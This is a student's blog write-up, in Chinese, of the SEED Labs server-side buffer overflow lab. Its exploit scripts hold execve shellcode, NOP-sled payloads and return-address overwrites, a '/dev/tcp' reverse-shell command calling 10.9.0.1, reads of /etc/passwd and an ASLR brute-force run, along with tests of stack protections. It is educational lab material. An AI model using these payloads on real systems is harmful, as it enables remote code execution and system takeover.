<!DOCTYPE html>
<html>
	<head>
		
<title>Buffer Overflow Attack Lab(Server Version)-无限进步</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="shortcut icon" type="image/x-icon" href="/image/shengdanwu.png">

<link rel="stylesheet" href="/css/index.css">



<meta name="keywords" content="栈溢出,pwn,">
<meta name="description" content="Seedlabs2.0-Buffer Overflow Attack Lab(Server Version)实验报告">


<script src="/js/jquery.min.js"></script>


<script src="/js/index.js"></script>


<script src="/js/fancybox.umd.js"></script>


<script src="/js/fancybox-images.js"></script>


<script src="/js/gitalk.min.js"></script>


<script src="/js/hljs.min.js"></script>
 
<script>hljs.highlightAll();</script>

	<meta name="generator" content="Hexo 8.1.1"></head>

	<body>
		
	<div class="header">
		<div class="header-top" id="header-top">
			<div class="h-left">
				<a href="/">
					<img src="/image/shengdanwu.png" alt="Quiet">
				</a>
			</div>
			<div class="h-right">
				<ul>
					
						
								<li>
									<a href="/">
										HOME
									</a>
									<span class="dot"></span>
								</li>
								
									
						
								<li>
									<a href="/archives">
										ARCHIVE
									</a>
									<span class="dot"></span>
								</li>
								
									
						
								<li>
									<a href="/categories">
										CATEGORIES
									</a>
									<span class="dot"></span>
								</li>
								
									
						
								<li>
									<a href="/tags">
										TAGS
									</a>
									<span class="dot"></span>
								</li>
								
									
						
								<li>
									<a href="/links">
										LINKS
									</a>
									<span class="dot"></span>
								</li>
								
									
						
								<li>
									<a href="/about">
										ABOUT
									</a>
									<span class="dot"></span>
								</li>
								
									
				</ul>
			</div>
			<div class="h-right-close">
				<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="24" height="24">
					<path fill="none" d="M0 0h24v24H0z" />
					<path d="M3 4h18v2H3V4zm0 7h18v2H3v-2zm0 7h18v2H3v-2z" fill="rgba(68,68,68,1)" />
				</svg>
			</div>
		</div>
	</div>
	<div class="sidebar">
    <div class="topo">
        <h2>Ram</h2>
    </div>
    <ul>
        
        <li>
            <a href="/">HOME</a>
        </li>
        
        <li>
            <a href="/archives">ARCHIVE</a>
        </li>
        
        <li>
            <a href="/categories">CATEGORIES</a>
        </li>
        
        <li>
            <a href="/tags">TAGS</a>
        </li>
        
        <li>
            <a href="/links">LINKS</a>
        </li>
        
        <li>
            <a href="/about">ABOUT</a>
        </li>
        
    </ul>
    <div class="my_foot">
        
        <a target="_blank" rel="noopener" href="https://github.com/RamBree">
            <img src="https://cdn.jsdelivr.net/gh/duogongneng/MyBlogImg/imggithub.png" alt="Quiet主题">
        </a>
        
    </div>
</div>
<div class='shelter'>
</div>
<style>
    .shelter{
        background-color: #333;
        opacity:0.5;
        cursor: pointer;
        display: none; 
        position: fixed;
        left: 0;
        top: 0; 
        right: 0;
        bottom: 0;
        z-index: 1998;
    }
    .sidebar {
        width: 66%;
        height: 100%;
        position: fixed;
        top: 0;
        right: -100%;
        bottom: 0;
        background: #fff;
        z-index: 1999;
        text-align: center;
        box-shadow: -6px 0 20px rgba(98, 94, 94, .815);
    }

    .topo {
        width: 100%;
        height: 200px;
        background: url(https://api.ixiaowai.cn/gqapi/gqapi.php) no-repeat;
        background-size: 100% 100%;
        position: relative;
        display: flex;
        align-items: flex-end
    }

    .topo h2 {
        color: #fff;
        z-index: 1;
        position: relative;
        margin: 0 0 10px 10px;
        font-size: 1.2em;
        box-sizing: border-box
    }

    .topo:before {
        content: '';
        background-image: url(/image/pattern.png);
        background-repeat: repeat;
        height: 100%;
        left: 0;
        position: absolute;
        top: 0;
        width: 100%;
        z-index: 1
    }

    .sidebar ul {
        width: 100%;
        margin-top: 50px
    }

    .sidebar ul li {
        height: 50px;
        list-style: none;
        font-size: 1.2em;
        text-align: right;
        margin-right: 10px
    }

    .sidebar ul li a {
        display: grid;
        color: #5d606a;
        text-overflow: ellipsis;
        width: 100%;
        text-decoration: none
    }

    .my_foot {
        width: 100%;
        padding: 10px;
        margin-bottom: 10px;
        position: absolute;
        bottom: 0
    }

    .my_foot a {
        text-decoration: none;
        margin-right: 10px;
        display: inline-block
    }

    .my_foot a img {
        width: 30px;
        height: 30px
    }
</style>

<script>
    $( function () {
	$( '.h-right-close>svg' )
		.click( function () {
			$( '.sidebar' )
				.animate( {
					right: "0"
				}, 500 );
			$( '.shelter' )
				.fadeIn( "slow" )
		} );
	$( '.shelter' )
		.click( function ( e ) {
			$( '.sidebar' )
				.animate( {
					right: "-100%"
				}, 500 );
			$( '.shelter' )
				.fadeOut( "slow" )
		} )
} )

</script>

<div class="post">
    <div class="post-header-background post-header-color"
    style="background: url('')" 
>
    <div class="post-header-background-content">
        <ul class="post-header-tag">
            
            
            <li><a href="/tags/栈溢出">栈溢出</a></li>
            
            <li><a href="/tags/pwn">pwn</a></li>
            
            
        </ul>
        
        <h1>Buffer Overflow Attack Lab(Server Version)</h1>
        <div class="post-header-info">
            <div class="post-header-info-author">
                
                    <svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 20 20">
                        <g>
                            <path fill="#12183A"
                                d="M6.187 15.265A6.47 6.47 0 0 0 10 16.5a6.47 6.47 0 0 0 3.813-1.235A4.99 4.99 0 0 0 10 13.5a4.99 4.99 0 0 0-3.813 1.765zM5.082 14.25A6.485 6.485 0 0 1 10 12c1.965 0 3.726.872 4.918 2.25a6.5 6.5 0 1 0-9.836 0zM10 18a8 8 0 1 1 0-16 8 8 0 0 1 0 16zm0-7a3 3 0 1 1 0-6 3 3 0 0 1 0 6zm0-1.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3z">
                            </path>
                        </g>
                    </svg>
                
                <span class="post-header-info-author-text"> <a href="../../about">Ram</a></span>
                <div class="post-header-info-author-categories">
                    
                         <a href="../../categories/SeedLabs2-0/" target="_blank" >SeedLabs2.0</a>
                    
                </div>
                <p>2025-11-03 21:51:09</p>
            </div>
        </div>
    </div>
</div>
    <div class="post-content" id="content">
  
  <div id="article" class="post-content-info">
    
      <div id="post-toc">
        <span class="post-toc-title">文章目录</span>
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Buffer-Overflow-Attack-Lab-Server-Version"><span class="toc-text">Buffer Overflow Attack Lab(Server Version)</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%8E%AF%E5%A2%83"><span class="toc-text">环境</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Task-1-Get-Familiar-with-the-Shellcode"><span class="toc-text">Task 1: Get Familiar with the Shellcode</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Task-2-Level-1-Attack"><span class="toc-text">Task 2: Level-1 Attack</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Task-3-Level-2-Attack"><span class="toc-text">Task 3: Level-2 Attack</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Task-4-Level-3-Attack"><span class="toc-text">Task 4: Level-3 Attack</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Task-5-Level-4-Attack"><span class="toc-text">Task 5: Level-4 Attack</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Task-6-Experimenting-with-the-Address-Randomization"><span class="toc-text">Task 6: Experimenting with the Address Randomization</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Tasks-7-Experimenting-with-Other-Countermeasures"><span class="toc-text">Tasks 7: Experimenting with Other Countermeasures</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%A0%88%E4%BF%9D%E6%8A%A4"><span class="toc-text">栈保护</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%A0%88%E5%8F%AF%E6%89%A7%E8%A1%8C"><span class="toc-text">栈可执行</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-text">总结</span></a></li></ol></li></ol>
      </div>
    

    <h1 id="Buffer-Overflow-Attack-Lab-Server-Version"><a href="#Buffer-Overflow-Attack-Lab-Server-Version" class="headerlink" title="Buffer Overflow Attack Lab(Server Version)"></a>Buffer Overflow Attack Lab(Server Version)</h1><h2 id="环境"><a href="#环境" class="headerlink" title="环境"></a>环境</h2><p>修改server_code中的<code>Makefile</code>,设置L1为122。对应上课日期10.22</p>
<img src="image-20251022101646517.png" alt="image-20251022101646517" style="zoom: 25%;" />

<p>在server-code编译代码。相当于服务器上执行了这些32位或者64位程序。但是作为一个攻击者，应该是不能获取这些信息的。</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token function">make</span>
<span class="token function">make</span> <span class="token function">install</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p><img src="/2025/11/03/seedlab1/image-20251022101936052.png" alt="image-20251022101936052"></p>
<p>启动docker。（原来的Ubuntu24.04没有成功，后面换了seedlab预构建的虚拟机就可以了）</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token function">sudo</span> <span class="token function">docker-compose</span> build
<span class="token function">sudo</span> <span class="token function">docker-compose</span> up<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p><img src="/2025/11/03/seedlab1/image-20251022192424957.png" alt="image-20251022192424957"></p>
<p>关闭保护措施，方便后续的攻击。</p>
<p><img src="/2025/11/03/seedlab1/image-20251022191616492.png" alt="image-20251022191616492"></p>
<h2 id="Task-1-Get-Familiar-with-the-Shellcode"><a href="#Task-1-Get-Familiar-with-the-Shellcode" class="headerlink" title="Task 1: Get Familiar with the Shellcode"></a>Task 1: Get Familiar with the Shellcode</h2><p>里面有两个 Python 程序:shellcode_32.py 和 shellcode_64.py，分别用于 32 位和 64 位 Shellcode。这两个 Python 程序将把二进制 Shellcode 写入 codefile_32 和 codefile_64 中。然后，您可以使用 call_shellcode 来执行其中的 Shellcode。</p>
<p>32位的shellcode如图所示。</p>
<img src="image-20251022201953789.png" alt="image-20251022201953789" style="zoom: 25%;" />

<p>可以通过<code>call_shellcode</code>来执行shellcode。</p>
<img src="image-20251022200224434.png" alt="image-20251022200224434" style="zoom:67%;" />

<h2 id="Task-2-Level-1-Attack"><a href="#Task-2-Level-1-Attack" class="headerlink" title="Task 2: Level-1 Attack"></a>Task 2: Level-1 Attack</h2><p>向服务器发送测试信息。可以观察服务器返回的信息。同样可以通过这种方式发送我们的shellcode。</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token builtin class-name">echo</span> hello <span class="token operator">|</span> <span class="token function">nc</span> <span class="token number">10.9</span>.0.5 <span class="token number">9090</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="/2025/11/03/seedlab1/image-20251022201212184.png" alt="image-20251022201212184"></p>
<p><img src="/2025/11/03/seedlab1/image-20251022201322719.png" alt="image-20251022201322719"></p>
<p>可以看到ebp的值为 0xffffd528, buffer的地址起点为 0xffffd4ac。</p>
<p>首先观察exploit.py的payload结构，将buffer全部填冲为<strong>nop</strong>，<code>start</code>为shellcode的起点，<code>ret</code>是新的返回地址，<code>offset</code>是buffer地址距离返回地址的偏移。</p>
<p>所以<code>offset=0xffffd528 - 0xffffd4ac + 4</code>。</p>
<p><code>ret</code>由于我们中间填充了<strong>nop</strong>,所以只要比之前的<code>return address</code>大，shellcode之前就行。之前的<code>return address= 0xffffd528+4。</code>       <code>start</code>在<code>ret</code>上或后面就行。</p>
<p>所以<code>export.py</code>代码如下</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token comment">#!/usr/bin/python3</span>
<span class="token keyword">import</span> sys

shellcode <span class="token operator">=</span> <span class="token punctuation">(</span>
   <span class="token string">"\xeb\x29\x5b\x31\xc0\x88\x43\x09\x88\x43\x0c\x88\x43\x47\x89\x5b"</span>
   <span class="token string">"\x48\x8d\x4b\x0a\x89\x4b\x4c\x8d\x4b\x0d\x89\x4b\x50\x89\x43\x54"</span>
   <span class="token string">"\x8d\x4b\x48\x31\xd2\x31\xc0\xb0\x0b\xcd\x80\xe8\xd2\xff\xff\xff"</span>
   <span class="token string">"/bin/bash*"</span>
   <span class="token string">"-c*"</span>
   <span class="token comment"># The * in this line serves as the position marker         *</span>
   <span class="token string">"/bin/ls -l; echo Hello 32; /bin/tail -n 2 /etc/passwd     *"</span>
   <span class="token string">"AAAA"</span>   <span class="token comment"># Placeholder for argv[0] --> "/bin/bash"</span>
   <span class="token string">"BBBB"</span>   <span class="token comment"># Placeholder for argv[1] --> "-c"</span>
   <span class="token string">"CCCC"</span>   <span class="token comment"># Placeholder for argv[2] --> the command string</span>
   <span class="token string">"DDDD"</span>   <span class="token comment"># Placeholder for argv[3] --> NULL</span>
<span class="token punctuation">)</span><span class="token punctuation">.</span>encode<span class="token punctuation">(</span><span class="token string">'latin-1'</span><span class="token punctuation">)</span>

content <span class="token operator">=</span> <span class="token builtin">bytearray</span><span class="token punctuation">(</span><span class="token number">0x90</span> <span class="token keyword">for</span> i <span class="token keyword">in</span> <span class="token builtin">range</span><span class="token punctuation">(</span><span class="token number">517</span><span class="token punctuation">)</span><span class="token punctuation">)</span> 
start <span class="token operator">=</span> <span class="token number">250</span>           
content<span class="token punctuation">[</span>start<span class="token punctuation">:</span>start <span class="token operator">+</span> <span class="token builtin">len</span><span class="token punctuation">(</span>shellcode<span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">=</span> shellcode
ret    <span class="token operator">=</span> <span class="token number">0xffffd528</span> <span class="token operator">+</span> <span class="token number">8</span>  
offset <span class="token operator">=</span> <span class="token number">0xffffd528</span> <span class="token operator">-</span> <span class="token number">0xffffd4ac</span> <span class="token operator">+</span> <span class="token number">4</span>        
content<span class="token punctuation">[</span>offset<span class="token punctuation">:</span>offset <span class="token operator">+</span> <span class="token number">4</span><span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token punctuation">(</span>ret<span class="token punctuation">)</span><span class="token punctuation">.</span>to_bytes<span class="token punctuation">(</span><span class="token number">4</span><span class="token punctuation">,</span>byteorder<span class="token operator">=</span><span class="token string">'little'</span><span class="token punctuation">)</span> 

<span class="token keyword">with</span> <span class="token builtin">open</span><span class="token punctuation">(</span><span class="token string">'badfile'</span><span class="token punctuation">,</span> <span class="token string">'wb'</span><span class="token punctuation">)</span> <span class="token keyword">as</span> f<span class="token punctuation">:</span>
  f<span class="token punctuation">.</span>write<span class="token punctuation">(</span>content<span class="token punctuation">)</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>可以看见成功执行了我们的shellcode。</p>
<p><img src="/2025/11/03/seedlab1/image-20251022203738897.png" alt="image-20251022203738897"></p>
<p>当然也可以反弹shell。我们修改shellcode片段如下。</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python">shellcode <span class="token operator">=</span> <span class="token punctuation">(</span>
   <span class="token string">"\xeb\x29\x5b\x31\xc0\x88\x43\x09\x88\x43\x0c\x88\x43\x47\x89\x5b"</span>
   <span class="token string">"\x48\x8d\x4b\x0a\x89\x4b\x4c\x8d\x4b\x0d\x89\x4b\x50\x89\x43\x54"</span>
   <span class="token string">"\x8d\x4b\x48\x31\xd2\x31\xc0\xb0\x0b\xcd\x80\xe8\xd2\xff\xff\xff"</span>
   <span class="token string">"/bin/bash*"</span>
   <span class="token string">"-c*"</span>
   <span class="token comment"># The * in this line serves as the position marker         *</span>
   <span class="token string">"/bin/bash -i > /dev/tcp/10.9.0.1/9090 0&lt;&amp;1 2>&amp;1           *"</span>
   <span class="token string">"AAAA"</span>   <span class="token comment"># Placeholder for argv[0] --> "/bin/bash"</span>
   <span class="token string">"BBBB"</span>   <span class="token comment"># Placeholder for argv[1] --> "-c"</span>
   <span class="token string">"CCCC"</span>   <span class="token comment"># Placeholder for argv[2] --> the command string</span>
   <span class="token string">"DDDD"</span>   <span class="token comment"># Placeholder for argv[3] --> NULL</span>
<span class="token punctuation">)</span><span class="token punctuation">.</span>encode<span class="token punctuation">(</span><span class="token string">'latin-1'</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>同时监听9090端口就可以查看反弹回来的shell。</p>
<img src="image-20251022205015627.png" alt="image-20251022205015627" style="zoom:67%;" />

<p>在后面的三个任务中，我都采用返回现实passwd的方法，来判断是否攻击成功。</p>
<h2 id="Task-3-Level-2-Attack"><a href="#Task-3-Level-2-Attack" class="headerlink" title="Task 3: Level-2 Attack"></a>Task 3: Level-2 Attack</h2><p>发送一个Hello到任务二的服务器</p>
<p><img src="/2025/11/03/seedlab1/image-20251022205252189.png" alt="image-20251022205252189"></p>
<p>任务二的信息更少，只有Buffer的地址信息。另一个对您可能有用的事实是，由于内存对齐的原因， 在 32 位程序中帧指针的值总是 4 的倍数，在 64 位程序中则是 8 的倍数。然后告诉我缓冲区的大小是100到200。</p>
<p>只需要将buffer把缓冲区全部都覆盖为返回地址，再进行跳转即可。start大于前面的ret即可。但是start不能太大，不然shellcode写不下。</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python">content <span class="token operator">=</span> <span class="token builtin">bytearray</span><span class="token punctuation">(</span><span class="token number">0x90</span> <span class="token keyword">for</span> i <span class="token keyword">in</span> <span class="token builtin">range</span><span class="token punctuation">(</span><span class="token number">517</span><span class="token punctuation">)</span><span class="token punctuation">)</span> 
start <span class="token operator">=</span> <span class="token number">300</span>            
content<span class="token punctuation">[</span>start<span class="token punctuation">:</span>start <span class="token operator">+</span> <span class="token builtin">len</span><span class="token punctuation">(</span>shellcode<span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">=</span> shellcode
ret    <span class="token operator">=</span> <span class="token number">0xffffd468</span> <span class="token operator">+</span> <span class="token number">248</span>
<span class="token comment"># offset = 240</span>
<span class="token keyword">for</span> offset <span class="token keyword">in</span> <span class="token builtin">range</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">,</span> <span class="token number">240</span><span class="token punctuation">,</span> <span class="token number">4</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
   content<span class="token punctuation">[</span>offset<span class="token punctuation">:</span>offset <span class="token operator">+</span> <span class="token number">4</span><span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token punctuation">(</span>ret<span class="token punctuation">)</span><span class="token punctuation">.</span>to_bytes<span class="token punctuation">(</span><span class="token number">4</span><span class="token punctuation">,</span>byteorder<span class="token operator">=</span><span class="token string">'little'</span><span class="token punctuation">)</span> <span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p><img src="/2025/11/03/seedlab1/image-20251022210826424.png" alt="image-20251022210826424"></p>
<h2 id="Task-4-Level-3-Attack"><a href="#Task-4-Level-3-Attack" class="headerlink" title="Task 4: Level-3 Attack"></a>Task 4: Level-3 Attack</h2><p><img src="/2025/11/03/seedlab1/image-20251022220512104.png" alt="image-20251022220512104"></p>
<p>与 32 位机器上的缓冲区溢出攻击相比，64 位机器上的攻击更加困难。尽管x64 体系结构支持 64 位地址空间，但只允许从 0x00 到 0x00007fffffff 的地址。这意味着对于每个地址（8 字节），最高的两个字节总是零。这会引发问题。在缓冲区溢出攻击中，我们需要使用strcpy 将 content 复制到堆栈中。strcpy 函数在遇到 0 时会终止。因此，如果在 content 中间出现 0，则在 0 之后的内容都不能被复制到堆栈中。</p>
<p>在存储ret 值的时候， 使用的是小端方式：“0x00007fffffffdfd0”是以“\xd0\xdf\xff\xff\0xff\0x7f\0x00\0x00”的形式存储的, 而之前的ret address最后两位也是\0x00\0x00，所以可以服用之前的地址。而且要保证覆盖后的ret其他字节也没有\0x00。因为ret后面不能写入任何信息，所以需要把shellcode写在前面。</p>
<p>ret&#x3D;0x00007fffffffe0f0</p>
<p>offset&#x3D;0x00007fffffffe1c0 - 0x00007fffffffe0f0 + 8</p>
<p>start &#x3D; 0</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token comment">#!/usr/bin/python3</span>
<span class="token keyword">import</span> sys

shellcode <span class="token operator">=</span> <span class="token punctuation">(</span>
   <span class="token string">"\xeb\x36\x5b\x48\x31\xc0\x88\x43\x09\x88\x43\x0c\x88\x43\x47\x48"</span>
   <span class="token string">"\x89\x5b\x48\x48\x8d\x4b\x0a\x48\x89\x4b\x50\x48\x8d\x4b\x0d\x48"</span>
   <span class="token string">"\x89\x4b\x58\x48\x89\x43\x60\x48\x89\xdf\x48\x8d\x73\x48\x48\x31"</span>
   <span class="token string">"\xd2\x48\x31\xc0\xb0\x3b\x0f\x05\xe8\xc5\xff\xff\xff"</span>
   <span class="token string">"/bin/bash*"</span>
   <span class="token string">"-c*"</span>
   <span class="token comment"># The * in this line serves as the position marker         * </span>
   <span class="token comment">#"/bin/bash -i > /dev/tcp/10.9.0.1/9090 0&lt;&amp;1 2>&amp;1.          *"</span>
   <span class="token string">"/bin/ls -l; echo Hello 64; /bin/tail -n 4 /etc/passwd     *"</span>
   <span class="token string">"AAAAAAAA"</span>   <span class="token comment"># Placeholder for argv[0] --> "/bin/bash"</span>
   <span class="token string">"BBBBBBBB"</span>   <span class="token comment"># Placeholder for argv[1] --> "-c"</span>
   <span class="token string">"CCCCCCCC"</span>   <span class="token comment"># Placeholder for argv[2] --> the command string</span>
   <span class="token string">"DDDDDDDD"</span>   <span class="token comment"># Placeholder for argv[3] --> NULL</span>
<span class="token punctuation">)</span><span class="token punctuation">.</span>encode<span class="token punctuation">(</span><span class="token string">'latin-1'</span><span class="token punctuation">)</span>

content <span class="token operator">=</span> <span class="token builtin">bytearray</span><span class="token punctuation">(</span><span class="token number">0x90</span> <span class="token keyword">for</span> i <span class="token keyword">in</span> <span class="token builtin">range</span><span class="token punctuation">(</span><span class="token number">517</span><span class="token punctuation">)</span><span class="token punctuation">)</span> 
start <span class="token operator">=</span> <span class="token number">0</span>        
content<span class="token punctuation">[</span>start<span class="token punctuation">:</span>start <span class="token operator">+</span> <span class="token builtin">len</span><span class="token punctuation">(</span>shellcode<span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">=</span> shellcode

ret<span class="token operator">=</span><span class="token number">0x00007fffffffe0f0</span>
offset<span class="token operator">=</span><span class="token number">0x00007fffffffe1c0</span> <span class="token operator">-</span> <span class="token number">0x00007fffffffe0f0</span> <span class="token operator">+</span> <span class="token number">8</span>
content<span class="token punctuation">[</span>offset<span class="token punctuation">:</span> offset <span class="token operator">+</span> <span class="token number">8</span><span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token punctuation">(</span>ret<span class="token punctuation">)</span><span class="token punctuation">.</span>to_bytes<span class="token punctuation">(</span><span class="token number">8</span><span class="token punctuation">,</span> byteorder<span class="token operator">=</span><span class="token string">'little'</span><span class="token punctuation">)</span>

<span class="token keyword">with</span> <span class="token builtin">open</span><span class="token punctuation">(</span><span class="token string">'badfile'</span><span class="token punctuation">,</span> <span class="token string">'wb'</span><span class="token punctuation">)</span> <span class="token keyword">as</span> f<span class="token punctuation">:</span>
  f<span class="token punctuation">.</span>write<span class="token punctuation">(</span>content<span class="token punctuation">)</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p><img src="/2025/11/03/seedlab1/image-20251022223635528.png" alt="image-20251022223635528"></p>
<h2 id="Task-5-Level-4-Attack"><a href="#Task-5-Level-4-Attack" class="headerlink" title="Task 5: Level-4 Attack"></a>Task 5: Level-4 Attack</h2><p><img src="/2025/11/03/seedlab1/image-20251022224220604.png" alt="image-20251022224220604"></p>
<p>可见现在缓冲区小了很多，如果采用任务四的方法，则会因为无法输入完整shellcode无法成功。</p>
<p>把返回地址增加到ebp+1200就可以了。<em>这里我也不知道为什么。我猜测是因为在main函数输入了buffer，然后在函数内strcpy的时候被截断了，然后就直接返回到main函数中，返回地址刚好命中shellcode，就在main函数中执行了我们的shellcode</em></p>
<blockquote>
<p><strong>课程补充</strong></p>
<p>审计stack.c源代码</p>
<p>badfile是从main()出来的，bof()是攻击函数。</p>
<p>数据流：main() -&gt; dummy_function(char *str) (中间填充了1000个字节) -&gt;bof(char *str)</p>
<pre class="line-numbers language-c" data-language="c"><code class="language-c"><span class="token keyword">void</span> <span class="token function">dummy_function</span><span class="token punctuation">(</span><span class="token keyword">char</span> <span class="token operator">*</span>str<span class="token punctuation">)</span>
<span class="token punctuation">&#123;</span>
    <span class="token keyword">char</span> dummy_buffer<span class="token punctuation">[</span><span class="token number">1000</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token function">memset</span><span class="token punctuation">(</span>dummy_buffer<span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">,</span> <span class="token number">1000</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">bof</span><span class="token punctuation">(</span>str<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>所以这个返回地址就是返回到main()函数中，在main()执行我们的shellcode，因为中间有1000个字节的填充，所以可以估计这个返回地址大概会加1000多，多次尝试可以估计。</p>
</blockquote>
<pre class="line-numbers language-python" data-language="python"><code class="language-python">content <span class="token operator">=</span> <span class="token builtin">bytearray</span><span class="token punctuation">(</span><span class="token number">0x90</span> <span class="token keyword">for</span> i <span class="token keyword">in</span> <span class="token builtin">range</span><span class="token punctuation">(</span><span class="token number">517</span><span class="token punctuation">)</span><span class="token punctuation">)</span> 
start <span class="token operator">=</span> <span class="token number">0</span>        
content<span class="token punctuation">[</span><span class="token number">517</span><span class="token operator">-</span><span class="token builtin">len</span><span class="token punctuation">(</span>shellcode<span class="token punctuation">)</span><span class="token punctuation">:</span> <span class="token number">517</span><span class="token punctuation">]</span> <span class="token operator">=</span> shellcode

ret<span class="token operator">=</span> <span class="token number">0x00007fffffffe1c0</span> <span class="token operator">+</span> <span class="token number">1200</span>
offset<span class="token operator">=</span><span class="token number">0x00007fffffffe1c0</span> <span class="token operator">-</span> <span class="token number">0x00007fffffffe160</span> <span class="token operator">+</span> <span class="token number">8</span>
content<span class="token punctuation">[</span>offset<span class="token punctuation">:</span> offset <span class="token operator">+</span> <span class="token number">8</span><span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token punctuation">(</span>ret<span class="token punctuation">)</span><span class="token punctuation">.</span>to_bytes<span class="token punctuation">(</span><span class="token number">8</span><span class="token punctuation">,</span> byteorder<span class="token operator">=</span><span class="token string">'little'</span><span class="token punctuation">)</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p><img src="/2025/11/03/seedlab1/image-20251022232013088.png" alt="image-20251022232013088"></p>
<h2 id="Task-6-Experimenting-with-the-Address-Randomization"><a href="#Task-6-Experimenting-with-the-Address-Randomization" class="headerlink" title="Task 6: Experimenting with the Address Randomization"></a>Task 6: Experimenting with the Address Randomization</h2><p>开启地址随机化。</p>
<p><img src="/2025/11/03/seedlab1/image-20251022233916902.png" alt="image-20251022233916902"></p>
<p>发送两个hello到服务器，可以看见每次地址都不一样。</p>
<img src="image-20251022234030211.png" alt="image-20251022234030211"  />

<p>暴力求解。使用 Task2 中 reverse shell 的 <code>exploit.py</code> 代码，执行命令</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">./brute-force.sh<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="/2025/11/03/seedlab1/image-20251022235731441.png" alt="image-20251022235731441"></p>
<p>运气很差。。。运行了接近13分钟才获取到了shell。</p>
<h2 id="Tasks-7-Experimenting-with-Other-Countermeasures"><a href="#Tasks-7-Experimenting-with-Other-Countermeasures" class="headerlink" title="Tasks 7: Experimenting with Other Countermeasures"></a>Tasks 7: Experimenting with Other Countermeasures</h2><h3 id="栈保护"><a href="#栈保护" class="headerlink" title="栈保护"></a>栈保护</h3><p>编辑 <code>Makefile</code> ，去除 <code>-fno-stack-protector</code> 选项，重新编译生成可执行文件。</p>
<p><img src="/2025/11/03/seedlab1/image-20251023000011883.png" alt="image-20251023000011883"></p>
<p>重新编译后，将badfile输入到程序中。发现程序检测到了攻击。</p>
<p><img src="/2025/11/03/seedlab1/image-20251023000203667.png" alt="image-20251023000203667"></p>
<h3 id="栈可执行"><a href="#栈可执行" class="headerlink" title="栈可执行"></a><strong>栈可执行</strong></h3><p>进入Makefile将<code>-z execstack</code>删除</p>
<p><img src="/2025/11/03/seedlab1/image-20251023000451641.png" alt="image-20251023000451641"></p>
<p>可以看见开启这个保护之后，之前的shellcode都无法执行。</p>
<p><img src="/2025/11/03/seedlab1/image-20251023000830113.png" alt="image-20251023000830113"></p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>通过这个实验了解了栈溢出攻击和栈相关的保护。本次栈溢出的利用方式主要是通过shellcode，即ret2shellcode，shellcode的编写也是很重要的一环，要比较熟悉汇编代码，本次实验虽然没有具体让我们自己设计，可以在未来继续学习。栈溢出的原理并不难，算是入门级别的二进制漏洞。</p>

  </div>
  <div id=""></div>
</div>

<script>
  
Fancybox.bind('[data-fancybox="fancybox-gallery-img"]', {
  dragToClose: true,
  Toolbar: true,
